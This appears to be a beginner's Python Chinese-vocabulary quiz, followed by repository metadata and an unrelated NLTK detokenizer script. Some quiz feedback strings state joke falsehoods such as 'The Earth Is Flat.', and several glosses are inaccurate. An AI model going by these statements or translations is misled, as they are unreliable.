def word_5(word='避孕套'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('BiYunTao')
if answer.lower() == 'BiYunTao'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'Your Parents Would Be Proud. This means condom\n'
def word_6(word='颜色'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('YanSe')
if answer.lower() == 'YanSe'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'President Kennedy was the fastest random speaker in the world with upwards of 350 words per minute.\nThis' \
' means color\n'
def word_7(word='杯子'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('BeiZi')
if answer.lower() == 'BeiZi'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is cup\n'
def word_8(word='怎麽樣'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('ZenMeYang')
if answer.lower() == 'ZenMeYang'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'The sound of E.T. walking was made by someone squishing her hands in jelly.\nThis is a way of asking ones' \
' opinion\n'
def word_9(word='飯店'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('FanDian')
if answer.lower() == 'FanDian'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'The Earth Is Flat.\nThis is restaurant\n'
def word_10(word='碉堡了'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('DiaoBaoLe')
if answer.lower() == 'DiaoBaoLe'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is like saying amazing!\n'
def word_11(word='明天'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('MingTian')
if answer.lower() == 'MingTian'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'Use this to say tomorrow!\n'
def word_12(word='昨天'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('ZuoTian')
if answer.lower() == 'ZuoTian'.lower():
print('correct')
score +=1
else:
print('wrong')
total += 1
time.sleep(1)
return 'Use this to say yesterday!\n'
def word_13(word='笑'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Xiao')
if answer.lower() == 'Xiao'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'Use this to say laugh!\n'
def word_14(word='能'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Neng')
if answer.lower() == 'Neng'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means can\n'
def word_15(word='炒飯'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('ChaoFan')
if answer.lower() == 'ChaoFan'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'Don\'t touch my fried rice.\n'
def word_16(word='變態'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('BianTai')
if answer.lower() == 'BianTai'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say abnormal.\n'
def word_17(word='漂亮'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('PiaoLiang')
if answer.lower() == 'PiaoLiang'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'Beautiful.\n'
def word_18(word='商店'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('ShangDian')
if answer.lower() == 'ShangDian'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say store.\n'
def word_19(word='学习'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('XueXi')
if answer.lower() == 'XueXi'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is what you\'re doing aka learning or to study.\n'
def word_20(word='笔'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Bi')
if answer.lower() == 'Bi'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say pen or pencil.\n'
def word_21(word='菜'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Cai')
if answer.lower() == 'Cai'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say vegetable and dish depending on context.\n'
def word_22(word='茶'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Cha')
if answer.lower() == 'Cha'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say tea.\n'
def word_23(word='常常'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('ChangChang')
if answer.lower() == 'ChangChang'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say often.\n'
def word_24(word='周'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Zhou')
if answer.lower() == 'Zhou'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say week.\n'
def word_25(word='周末'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('ZhouMo')
if answer.lower() == 'ZhouMo'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say weekend.\n'
def word_26(word='做'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Zuo')
if answer.lower() == 'Zuo'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is to do.\n'
def word_27(word='都'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Dou')
if answer.lower() == 'Dou'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say both or all.\n'
def word_28(word='难'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Nan')
if answer.lower() == 'Nan'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say difficult.\n'
def word_29(word='更'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Geng')
if answer.lower() == 'Geng'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is an adverb that means more.\n'
def word_30(word='用'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Yong')
if answer.lower() == 'Yong'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say use.\n'
def word_31(word='去'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Qu')
if answer.lower() == 'Qu'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say go.\n'
def word_32(word='会'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Hui')
if answer.lower() == 'Hui'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say can.\n'
def word_33(word='多'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Duo')
if answer.lower() == 'Duo'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This adjective means many.\n'
def word_34(word='书包'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('ShuBao')
if answer.lower() == 'ShuBao'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say backpack.\n'
def word_35(word='话'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Hua')
if answer.lower() == 'Hua'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say talk.\n'
def word_36(word='活'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Huo')
if answer.lower() == 'Huo'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say life and can also be used to mean saved a life.\n'
def word_37(word='星期'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('XingQi')
if answer.lower() == 'XingQi'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means day of the week.\n'
def word_38(word='影片'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('YingPian')
if answer.lower() == 'YingPian'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say video.\n'
def word_39(word='电玩'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('DianWan')
if answer.lower() == 'DianWan'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say video game.\n'
def word_40(word='书'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Shu')
if answer.lower() == 'Shu'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say book.\n'
def word_41(word='歌曲'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('GeQu')
if answer.lower() == 'GeQu'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means song.\n'
def word_42(word='听'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Ting')
if answer.lower() == 'Ting'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say listen.\n'
def word_43(word='唱'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Chang')
if answer.lower() == 'Chang'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say sing.\n'
def word_44(word='跳'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Tiao')
if answer.lower() == 'Tiao'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means jump.\n'
def word_45(word='看'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Kan')
if answer.lower() == 'Kan'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say watch.\n'
def word_46(word='打'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Da')
if answer.lower() == 'Da'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say strike or play.\n'
def word_47(word='球'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Qiu')
if answer.lower() == 'Qiu'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say sphere or ball.\n'
def word_48(word='热'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Re')
if answer.lower() == 'Re'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say hot.\n'
def word_49(word='音乐'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('YinYue')
if answer.lower() == 'YinYue'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is how you say music.\n'
def word_50(word='生活'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('ShengHuo')
if answer.lower() == 'ShengHuo'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means life in a general way.\n'
def word_51(word='有的(时候)'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('YouDe(ShiHou)')
if answer.lower() == 'YouDe'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means some(times).\n'
def word_52(word='火'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Huo')
if answer.lower() == 'Huo'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means fire or rage.\n'
def word_53(word='油'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('You')
if answer.lower() == 'You'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means grease/oil.\n'
def word_54(word='加'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Jia')
if answer.lower() == 'Jia'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means add.\n'
def word_55(word='帮'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Bang')
if answer.lower() == 'Bang'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This is the verb help.\n'
def word_56(word='就'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Jiu')
if answer.lower() == 'Jiu'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means to come near or just.\n'
def word_57(word='莫'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Mo')
if answer.lower() == 'Mo'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means do not, can not, and is a negative word.\n'
def word_58(word='真'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Zhen')
if answer.lower() == 'Zhen'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means true.\n'
def word_59(word='觉得'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('JueDe')
if answer.lower() == 'JueDe'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means to think or feel.\n'
def word_60(word='别的'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('BieDe')
if answer.lower() == 'BieDe'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means other.\n'
def word_61(word='睡觉'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('ShuiJiao')
if answer.lower() == 'ShuiJiao'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means to sleep.\n'
def word_62(word='需要'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('XuYao')
if answer.lower() == 'XuYao'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means need.\n'
def word_63(word='一般'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('YiBan')
if answer.lower() == 'YiBan'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means the same.\n'
def word_64(word='一样'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('YiYang')
if answer.lower() == 'YiYang'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means the same or alike.\n'
def word_65(word='其'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Qi')
if answer.lower() == 'Qi'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means she, he, or it.\n'
def word_66(word='心'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Xin')
if answer.lower() == 'Xin'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means heart.\n'
def word_67(word='入'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Ru')
if answer.lower() == 'Ru'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means to enter.\n'
def word_68(word='牛'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Niu')
if answer.lower() == 'Niu'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means cow.\n'
def word_69(word='妙'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Miao')
if answer.lower() == 'Miao'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means wonderful.\n'
def word_70(word='全'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Quan')
if answer.lower() == 'Quan'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means to make complete.\n'
def word_71(word='身'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Shen')
if answer.lower() == 'Shen'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means ones body or oneself.\n'
def word_72(word='作'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Zuo')
if answer.lower() == 'Zuo'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means work and the verb can mean to grow.\n'
def word_73(word='水平'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('ShuiPing')
if answer.lower() == 'ShuiPing'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means standard or level.\n'
def word_74(word='从'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Cong')
if answer.lower() == 'Cong'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means to join or follow.\n'
def word_75(word='床'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Chuang')
if answer.lower() == 'Chuang'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means bed.\n'
def word_76(word='床單'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('ChuangDan')
if answer.lower() == 'ChuangDan'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means bed sheet.\n'
def word_77(word='床墊'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('ChuangDian')
if answer.lower() == 'ChuangDian'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means mattress.\n'
def word_78(word='毯子'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('TanZi')
if answer.lower() == 'TanZi'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means blanket.\n'
def word_79(word='衣櫃'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('YiGui')
if answer.lower() == 'YiGui'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means dresser.\n'
def word_80(word='枕頭'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('ZhenTou')
if answer.lower() == 'ZhenTou'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means pillow.\n'
def word_81(word='木'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Mu')
if answer.lower() == 'Mu'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means wood.\n'
def word_82(word='土'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Tu')
if answer.lower() == 'Tu'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means earth or dirt; soil.\n'
def word_83(word='金'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Jin')
if answer.lower() == 'Jin'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means metal or gold.\n'
def word_84(word='臥室'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('WoShi')
if answer.lower() == 'WoShi'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means bedroom.\n'
def word_85(word='浴室'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('YuShi')
if answer.lower() == 'YuShi'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means bathroom.\n'
# my_ListI is individual characters my_ListD is words with two characters
# and my_ListS is sentences
my_ListI = [word_1,word_13, word_14, word_20, word_21, word_22,word_24, word_26, word_27, word_28, word_29, word_30,
word_31, word_32, word_33,word_35, word_36, word_40, word_42, word_43, word_44, word_45,word_46, word_47,
word_48, word_52, word_53, word_54, word_55, word_56, word_57, word_58, word_65, word_66, word_67, word_68,
word_69, word_70, word_71, word_72, word_74, word_75, word_81, word_82, word_83
]
my_ListD = [word_2, word_3, word_4, word_6, word_7, word_9, word_11, word_12, word_15, word_16, word_17, word_18,
word_19, word_23, word_25, word_34, word_37, word_38, word_39, word_41, word_49, word_50, word_51, word_59,
word_60, word_61, word_62, word_63, word_64, word_73, word_76, word_77, word_78, word_79, word_80, word_84,
word_85
]
my_ListS = [word_5, word_8, word_10,
]
attempts = 0
# This is a function for randomly displaying individual characters
def the_ProblemI():
global score
global total
global attempts
while attempts <= 1:
print(random.choice(my_ListI)())
time.sleep(.5)
print('Score=', score)
print('Total=', total, '\n')
time.sleep(1)
while total == 20:
print('Would you like to continue?')
does_Continue = input()
if does_Continue == 'yes'.lower():
score = 0
total = 0
the_ProblemI()
if does_Continue != 'yes'.lower():
score = 0
total = 0
if score <= 11:
print('You Failed\n')
the_Quiz()
if score <= 13:
print('You scored a D\n')
the_Quiz()
if score <= 15:
print('You scored a C\n')
the_Quiz()
if score <= 17:
print('You scored a B\n')
the_Quiz()
if score >= 18:
print('Nice, you scored an A\n')
the_Quiz()
# This is a function for randomly displaying double characters
def the_ProblemD():
global score
global total
global attempts
while attempts <= 1:
print(random.choice(my_ListD)())
time.sleep(.5)
print('Score=', score)
print('Total=', total, '\n')
time.sleep(1)
while total == 20:
print('Would you like to continue?')
does_Continue = input()
if does_Continue == 'yes'.lower():
score = 0
total = 0
the_ProblemD()
if does_Continue != 'yes'.lower():
score = 0
total = 0
if score <= 11:
print('You Failed\n')
the_Quiz()
if score <= 13:
print('You scored a D\n')
the_Quiz()
if score <= 15:
print('You scored a C\n')
the_Quiz()
if score <= 17:
print('You scored a B\n')
the_Quiz()
if score >= 18:
print('Nice, you scored an A\n')
the_Quiz()
# This is a function for randomly displaying sentences
def the_ProblemS():
global score
global total
global attempts
while attempts <= 1:
print(random.choice(my_ListS)())
time.sleep(.5)
print('Score=', score)
print('Total=', total, '\n')
time.sleep(1)
while total == 20:
print('Would you like to continue?')
does_Continue = input()
if does_Continue == 'yes'.lower():
score = 0
total = 0
the_ProblemS()
if does_Continue != 'yes'.lower():
score = 0
total = 0
if score <= 11:
print('You Failed\n')
the_Quiz()
if score <= 13:
print('You scored a D\n')
the_Quiz()
if score <= 15:
print('You scored a C\n')
the_Quiz()
if score <= 17:
print('You scored a B\n')
the_Quiz()
if score >= 18:
print('Nice, you scored an A\n')
the_Quiz()
# This is the function for the quiz itself
def the_Quiz():
global score
global total
global attempts
print('Would you like to practice single character, double characters, or sentences?\n')
the_Decider = input()
print('\n')
while the_Decider == 'single'.lower():
the_ProblemI()
while the_Decider == 'double'.lower():
the_ProblemD()
while the_Decider == 'sentences'.lower():
the_ProblemS()
# Time to level up ಠ_ಠ
the_Quiz()
| 25.150862 | 121 | 0.520113 | 5,068 | 40,845 | 4.148579 | 0.098264 | 0.064685 | 0.105113 | 0.088942 | 0.748014 | 0.747111 | 0.745398 | 0.743686 | 0.743686 | 0.743686 | 0 | 0.023653 | 0.337544 | 40,845 | 1,623 | 122 | 25.166359 | 0.753382 | 0.010821 | 0 | 0.758344 | 0 | 0.000668 | 0.203684 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.059413 | false | 0 | 0.001335 | 0 | 0.11749 | 0.303071 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
070860cfd22d6473bebd783576b2cdeeeded3e26 | 2,448 | py | Python | prepro/nltk_detok.py | snukky/gec-scripts | dc3a7d5701aca15c9e743fb7965f1223afcec25f | [
"MIT"
] | 5 | 2018-09-12T13:27:10.000Z | 2021-05-18T11:08:52.000Z | prepro/nltk_detok.py | snukky/gec-scripts | dc3a7d5701aca15c9e743fb7965f1223afcec25f | [
"MIT"
] | null | null | null | prepro/nltk_detok.py | snukky/gec-scripts | dc3a7d5701aca15c9e743fb7965f1223afcec25f | [
"MIT"
] | 1 | 2021-09-10T14:20:45.000Z | 2021-09-10T14:20:45.000Z | #!/usr/bin/python
import sys, re
def detokenize_nltk(text):
text = re.sub(r'-LRB-', '(', text)
text = re.sub(r'-RRB-', ')', text)
#text = re.sub(r'\([^\)]+\s[^\)]+\)', ' ', text) # drop parenthesed content
text = re.sub(r' +', ' ', text)
text = re.sub(r'^ ', '', text)
text = re.sub(r' $', '', text)
text = re.sub(r' ?,( ?,)+ ?', ' ', text)
#text = re.sub(r'^([^a-zA-Z\d]*)[,;.?!] *', r'\1', text)
#text = re.sub(r"`` *''", ' ', text)
#text = re.sub(r" ''", '"', text)
#text = re.sub(r'`` ', '"', text)
#text = re.sub(r' \'\'', '"', text)
text = re.sub(r' n\'t', 'n\'t', text)
text = re.sub(r' \'t', '\'t', text)
text = re.sub(r'\$ ([0-9])', r'$\1', text)
text = re.sub(r" '([sdm]|ll|re|ve)\b", r"'\1", text)
text = re.sub(r'(\d) , (\d\d\d([^\d]|$))', r'\1,\2', text)
text = re.sub(r' ([;:,.?!\)\]\}]["\'\)\]\}]?) ', r'\1 ', text)
##text = re.sub(r'([\)\]\}]+) ([;:,.?!]+) ', r'\1\2 ', text)
text = re.sub(r's \' ', r"s' ", text)
# text = re.sub(r'( |^)(["\'\(\[\{]) ([a-zA-Z\d])', r' \2\3', text) # " a => "a
text = re.sub(r'( |^)(["\(\[\{]) ([a-zA-Z\d])', r'\2\3', text) # " a => "a
text = re.sub(r' ([^a-zA-Z\d]+)$', r'\1', text) # " ." => "."
#text = re.sub(r'"[^a-zA-Z\d]*"', '', text)
#text = re.sub(r'\([^a-zA-Z\d]*\)', '', text) # (,)
#text = re.sub(r'\[[^a-zA-Z\d]*\]', '', text)
#text = re.sub(r'\{[^a-zA-Z\d]*\}', '', text)
#text = re.sub(r'\'[^a-zA-Z\d]*\'', '', text)
text = re.sub(' +', ' ', text)
text = re.sub('^ +', '', text)
text = re.sub(' +$', '', text)
text = re.sub(' +\.\.\.', '...', text)
text = re.sub('! !( !)+', '!!!', text)
text = re.sub(r'\s*[,;]+\s*([.!?]["\'\)\]\}]?|["\'\)\]\}][.!?])$', r'\1', text) # ,. => .
text = re.sub(r'\'([a-zA-Z\d-]+) \' ', r"'\1' ", text)
while re.search(r'\b[A-Z]\. [A-Z]\.', text):
text = re.sub(r'\b([A-Z]\.) ([A-Z]\.)', r'\1\2', text) # A. B. C.
text = re.sub(r'([A-Z]) & ([A-Z])', r'\1&\2', text) # AT & T
#text = re.sub(r'([A-Za-z0-9])', (lambda x: x.group(1).capitalize()), text, 1) # ^a => A
#text = re.sub(r'([a-zA-Z0-9])(["\)\]\}])$', r'\1.\2', text) # a" => a."
#text = re.sub(r'([a-zA-Z0-9])$', r'\1.', text) # a$ => a.
#text = re.sub(r'^([^"]*)"([^"]*)$', r'\1\2', text) # lonely quotes
return text
